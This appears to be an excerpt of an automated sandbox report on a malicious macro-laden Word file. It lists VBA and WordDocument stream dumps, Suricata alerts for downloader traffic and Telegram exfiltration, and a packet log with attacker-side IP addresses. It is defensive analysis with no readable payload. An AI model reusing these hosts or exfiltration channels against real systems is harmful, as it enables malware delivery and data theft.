Data Raw:	cc 61 a3 00 00 01 00 ff 09 04 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 05 00 02 00 fe 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00

Stream Path: Macros/VBA/dir, File Type: VAX-order 68K Blit (standalone) executable, Stream Size: 523

General
Stream Path:	Macros/VBA/dir
CLSID:
File Type:	VAX-order 68K Blit (standalone) executable
Stream Size:	523
Entropy:	6.287398072677158
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . 0 * . . . . p . . H . . . . d . . . . . . . P r o j e c t . Q . ( . . @ . . . . . = . . . . l . . . . . . . . t E i . . . . J . < . . . . . r s t d . o l e > . . s . t . . d . o . l . e P . . . h . % ^ . . * . \\ G { 0 0 0 2 0 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } # . 2 . 0 # 0 # C : . \\ W i n d o w s . \\ S y s W O W 6 . 4 \\ . e 2 . t l b . # O L E A u t o m a t i o n . ` . . . E N o r m a l . E N C r . m . a Q F . . . . . * . \\ C . . . . . . i . . . ! O f f i c . g O . f . i . c
Data Raw:	01 07 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 07 00 1c 00 50 72 6f 6a 65 63 74 05 51 00 28 00 00 40 02 14 06 02 14 3d ad 02 0a 07 02 6c 01 14 08 06 12 09 02 12 80 74 45 97 69 09 00 0c 02 4a 12 3c 02 0a 16 00 01 72 73 74 64 10 6f 6c 65 3e 02 19 73 00 74 00 00 64 00 6f 00 6c 00 65 50 00 0d 00 68 00 25 5e 00 03 2a 00 5c 47 7b 30 30

Stream Path: WordDocument, File Type: data, Stream Size: 4096

General
Stream Path:	WordDocument
CLSID:
File Type:	data
Stream Size:	4096
Entropy:	1.0858150662104433
Base64 Encoded:	False
Data ASCII:	. Y . . . . . . . . . . . . . . . . . . . . . . . . . . b j b j [ [ . . . . . . . . . . . . . . . . . . . . . . . . . . 9 . \\ 9 . \\ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2 . . . . . . . 2 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ? . . . 0 . . . . . . . . .
Data Raw:	ec a5 c1 00 59 e0 09 04 00 00 f8 12 bf 00 00 00 00 00 00 10 00 00 00 00 00 08 00 00 02 08 00 00 0e 00 62 6a 62 6a 5b c9 5b c9 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 09 04 16 00 2e 0e 00 00 39 a3 0a 5c 39 a3 0a 5c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-14T08:08:14.579595+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49742	166.62.27.188	443	TCP
2025-01-14T08:08:23.466369+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49754	132.226.8.169	80	TCP
2025-01-14T08:08:25.098612+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49754	132.226.8.169	80	TCP
2025-01-14T08:08:25.579951+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49758	104.21.16.1	443	TCP
2025-01-14T08:08:26.450742+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	52742	132.226.8.169	80	TCP
2025-01-14T08:08:29.469167+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	52746	104.21.16.1	443	TCP
2025-01-14T08:08:30.931425+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	52748	104.21.16.1	443	TCP
2025-01-14T08:08:32.440891+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	52750	104.21.16.1	443	TCP
2025-01-14T08:08:33.939308+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	52752	104.21.16.1	443	TCP
2025-01-14T08:08:34.729831+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	52753	132.226.8.169	80	TCP
2025-01-14T08:08:36.058488+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	52753	132.226.8.169	80	TCP
2025-01-14T08:08:36.746760+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	52758	104.21.16.1	443	TCP
2025-01-14T08:08:36.820422+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	52759	104.21.16.1	443	TCP
2025-01-14T08:08:37.619699+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	52760	132.226.8.169	80	TCP
2025-01-14T08:08:37.751993+0100	1810007	Joe Security ANOMALY Telegram Send Message	1	192.168.2.4	52761	149.154.167.220	443	TCP
2025-01-14T08:08:39.103479+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	52763	132.226.8.169	80	TCP
2025-01-14T08:08:39.811236+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	52764	104.21.16.1	443	TCP
2025-01-14T08:08:43.220341+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	52769	104.21.16.1	443	TCP
2025-01-14T08:08:43.943210+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	52768	132.226.8.169	80	TCP
2025-01-14T08:08:45.484581+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	52768	132.226.8.169	80	TCP
2025-01-14T08:08:46.083888+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	52775	104.21.16.1	443	TCP
2025-01-14T08:08:46.974552+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	52777	132.226.8.169	80	TCP
2025-01-14T08:08:47.545333+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	52779	104.21.16.1	443	TCP
2025-01-14T08:08:48.846989+0100	1810007	Joe Security ANOMALY Telegram Send Message	1	192.168.2.4	52782	149.154.167.220	443	TCP
2025-01-14T08:08:50.435647+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	52785	104.21.16.1	443	TCP
2025-01-14T08:08:57.208320+0100	1810007	Joe Security ANOMALY Telegram Send Message	1	192.168.2.4	52796	149.154.167.220	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 14, 2025 08:08:10.898468018 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:10.903680086 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:10.903872013 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:10.904203892 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:10.909176111 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.440207958 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.440237999 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.440253973 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.440269947 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.440288067 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.440406084 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.440407038 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.477561951 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.477612019 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.477648020 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.477679968 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.477718115 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.477751970 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.477766037 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.477766037 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.477766037 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.477787971 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.477849007 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.530874014 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.530896902 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.530911922 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.530925989 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.530955076 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.531069040 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.531069040 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.531219006 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.531255007 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.531295061 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.531302929 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.531335115 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.531359911 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.531809092 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.531838894 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.531874895 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.567739964 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.567769051 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.567807913 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.567884922 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.567918062 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.567943096 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.567951918 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.567985058 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.568006039 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.568021059 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.568078041 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.568798065 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.568831921 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.568866014 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.568893909 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.568898916 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.568952084 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.569459915 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.569492102 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.569525003 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.569545031 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.569557905 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.569610119 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.621376038 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.621424913 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.621462107 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.621484995 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.621495962 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.621534109 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.621546984 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.621814013 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.621849060 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.621867895 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.621884108 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.621917009 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.621931076 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.621952057 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.621999025 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.622523069 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.622575045 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.622626066 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.622633934 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.622661114 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.622694969 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.622713089 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.623528957 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.623562098 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.623583078 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.623610973 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.623675108 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.658361912 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.658411026 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.658466101 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.658499002 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.658512115 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.658534050 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.658560991 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.658569098 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.658605099 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.658617020 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.658649921 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.658706903 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.659210920 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.659245014 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.659280062 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.659297943 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.659311056 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.659368992 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.659387112 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.659404039 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.659457922 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.660048962 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.660080910 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.660114050 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.660131931 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.660204887 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.660244942 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.660265923 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.660279989 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.660335064 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.660841942 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.660892010 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.660924911 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.660944939 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.660957098 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.660990953 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.661005020 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.661026955 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.661077976 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.661643028 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.698741913 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.698764086 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.698779106 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.698798895 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.698833942 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.711790085 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.711815119 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.711829901 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.711843967 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.711858988 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.711863995 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.711874008 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.711884975 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.711890936 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.711906910 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.711920977 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.711934090 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.711965084 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.712202072 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.712219000 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.712251902 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.712259054 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.712275028 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.712289095 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.712306023 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.712311983 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.712321043 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.712336063 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.712347031 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.712348938 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.712378025 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.712397099 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.713196993 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.713244915 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.713282108 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.713301897 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.713315010 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.713349104 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.713366985 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.713382006 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.713417053 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.713435888 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.748944044 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.749027967 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.749032974 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.749069929 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.749124050 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.749125957 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.749138117 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.749150991 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.749156952 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.749176025 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.749201059 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.749253988 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.749301910 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.749311924 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.749346018 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.749377966 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.749393940 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.749413013 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.749444962 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.749464035 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.749526024 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.749557972 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.749579906 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.749608040 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.749661922 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.750113010 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.750147104 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.750180006 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.750210047 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.750216961 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.750252008 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.750273943 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.750288010 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.750320911 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.750341892 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.750353098 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.750386000 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.750403881 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.750422955 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.750478983 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.751099110 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.751131058 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.751163960 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.751184940 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.751195908 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.751230001 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.751251936 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.751262903 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.751308918 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.751333952 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.751360893 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.751394987 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.751416922 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.751429081 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.751483917 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.751895905 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.752039909 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.752072096 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.752094984 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.752104044 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.752137899 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.752156019 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.752185106 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.752216101 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.752233982 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.752249956 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.752285004 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.752300978 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.752320051 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.752371073 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.752829075 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.789231062 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.789273977 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.789290905 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.789309025 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.789323092 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.789351940 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.789431095 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.789431095 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.789431095 CET	49737	80	192.168.2.4	147.124.216.113
Jan 14, 2025 08:08:11.802256107 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.802272081 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.802288055 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.802304029 CET	80	49737	147.124.216.113	192.168.2.4
Jan 14, 2025 08:08:11.802355051 CET	49737	80	192.168.2.4	147.124.216.113
